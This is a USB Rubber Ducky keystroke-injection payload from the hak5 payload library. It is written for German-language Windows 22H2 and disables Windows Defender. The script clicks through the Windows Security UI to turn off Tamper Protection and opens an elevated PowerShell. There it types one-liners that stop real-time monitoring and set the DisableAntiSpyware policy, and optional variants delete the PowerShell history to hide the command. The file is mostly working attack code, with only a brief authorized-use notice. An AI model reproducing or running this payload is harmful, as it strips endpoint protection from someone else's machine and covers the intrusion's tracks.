GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/execution/Disable_Windows_Defender22H2/Disable_Windows_Defender.txt
REM Disable Windows Defender
REM VERSION 1.0
REM Author HackingMark
REM Turns Tamper Protection off through the Windows Security UI, then opens an elevated PowerShell
REM and disables real-time monitoring and sets the DisableAntiSpyware policy value, on Windows 22H2.
REM Tested on German-language Windows only: the Start search term, the position-based TAB navigation
REM and the UAC accelerator (ALT j) all depend on that UI. Adjust them before using another language or build.
REM Both functions are only defined, not called. Uncomment DISABLE_WINDOWS_DEFENDER() or RESTORE()
REM at the end of this file to use it within the Extension, or call them later in your payload.
REM Use only on systems you are authorized to test. RESTORE() reverts the PowerShell changes but does
REM not re-enable Tamper Protection, which DISABLE_WINDOWS_DEFENDER() switches off through the UI.
REM PowerShell one-liners typed into the elevated shell. Name suffixes: _F = disable without clearing
REM history, _T = disable and delete the PSReadLine history file, _R / _RC = the matching restore variants.
REM Every variant ends with "exit" so the PowerShell window closes itself after the command runs.
REM Disable: turn off real-time monitoring, then set the DisableAntiSpyware policy value to 1.
REM Set-MpPreference is presumably what Tamper Protection would otherwise block, which is why the
REM calling function switches Tamper Protection off through the UI before typing this.
REM NOTE(review): New-ItemProperty does not create a missing parent key -- confirm the
REM Policies\Microsoft\Windows Defender key exists on the target build, or the second command fails.
REM NOTE(review): Microsoft documents DisableAntiSpyware as a legacy setting that current Defender
REM platform versions may ignore on client SKUs -- verify the effect on the target instead of assuming Defender is off.
DEFINE ATTACK_F Set-MpPreference -DisableRealtimeMonitoring $true; New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force; exit;
REM Same as ATTACK_F, then deletes the PSReadLine history file so the typed command is not kept there.
REM Only that one file is removed; whatever else Windows or Defender records about the change is untouched.
DEFINE ATTACK_T Set-MpPreference -DisableRealtimeMonitoring $true; New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit;
REM Restore: re-enable real-time monitoring and set DisableAntiSpyware back to 0. The policy value is
REM left in place (set to 0, not removed), and Tamper Protection is not re-enabled by this command.
DEFINE ATTACK_R Set-MpPreference -DisableRealtimeMonitoring $false; New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0 -PropertyType DWORD -Force; exit;
REM ATTACK_R plus deletion of the PSReadLine history file.
DEFINE ATTACK_RC Set-MpPreference -DisableRealtimeMonitoring $false; New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0 -PropertyType DWORD -Force; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit;
REM Search term typed into Start to open the Windows Security app. Change it for the target
REM UI language (the German name is used here; e.g. "Windows Security" on English Windows).
DEFINE TERM_WIN_SEC_CENTER Windows-Sicherheit
REM $clean = TRUE selects the _T/_RC commands (the PSReadLine history file is deleted);
REM FALSE selects the _F/_R commands and leaves the history file alone.
VAR $clean = TRUE

REM Enumerate as a keyboard only, then give the host time to finish device setup before typing.
ATTACKMODE HID
DELAY 2000
FUNCTION DISABLE_WINDOWS_DEFENDER()
REM Switches a toggle in the Windows Security UI (per the header: Tamper Protection) off, then opens
REM an elevated PowerShell via Win+X and types ATTACK_T or ATTACK_F, selected by $clean.
REM Assumes the logged-on user is a local administrator and that UAC prompts appear (each one is
REM answered with ALT j, presumably "Ja" on the German dialog). The TAB counts below are position-based
REM and tied to the Windows Security layout of the tested German 22H2 build -- on another build or
REM language they may land on a different control, so re-verify them before use.
REM Open Start search, type the Windows Security term and launch the first result.
GUI s
DELAY 500
STRINGLN TERM_WIN_SEC_CENTER
DELAY 500
ENTER
REM Four TABs then ENTER: move to and open the protection settings page (exact target depends on the UI layout).
TAB
TAB
TAB
TAB
ENTER
DELAY 500
REM Four TABs then SPACE: flip the focused switch -- per the header comment, the Tamper Protection switch.
TAB
TAB
TAB
TAB
SPACE
DELAY 500
REM Confirm the UAC prompt raised by the toggle (ALT j; change the letter for other UI languages).
ALT j
DELAY 500
REM Close the Windows Security app.
ALT F4
DELAY 1500
REM Win+X Quick Link menu, "A" accelerator for the admin shell entry, then confirm its UAC prompt.
GUI x
DELAY 100
STRING a
DELAY 500
ALT j
DELAY 500
REM Type the PowerShell one-liner; it ends with "exit", so the window closes itself.
IF ($clean == TRUE) THEN
STRINGLN ATTACK_T
ELSE
STRINGLN ATTACK_F
END_IF

END_FUNCTION
FUNCTION RESTORE()
REM Opens an elevated PowerShell via Win+X and types ATTACK_RC or ATTACK_R (selected by $clean)
REM to re-enable real-time monitoring and set the DisableAntiSpyware policy value back to 0.
REM Caveat: this is not a full undo. There are no UI steps here, so Tamper Protection, which
REM DISABLE_WINDOWS_DEFENDER switches off through the Windows Security app, stays off, and the
REM policy value is left present (set to 0) rather than removed. Check the Windows Security app afterwards.
REM Same assumptions as DISABLE_WINDOWS_DEFENDER: local administrator, UAC prompt answered with ALT j.
REM Win+X Quick Link menu, "A" accelerator for the admin shell entry, then confirm its UAC prompt.
GUI x
DELAY 100
STRING a
DELAY 500
ALT j
DELAY 500
REM Type the restore one-liner; it ends with "exit", so the window closes itself.
IF ($clean == TRUE) THEN
STRINGLN ATTACK_RC
ELSE
STRINGLN ATTACK_R
END_IF
END_FUNCTION
REM Uncomment one of the calls below to run that mode when the payload starts (the functions above are only defined, not called):
REM DISABLE_WINDOWS_DEFENDER()
REM RESTORE()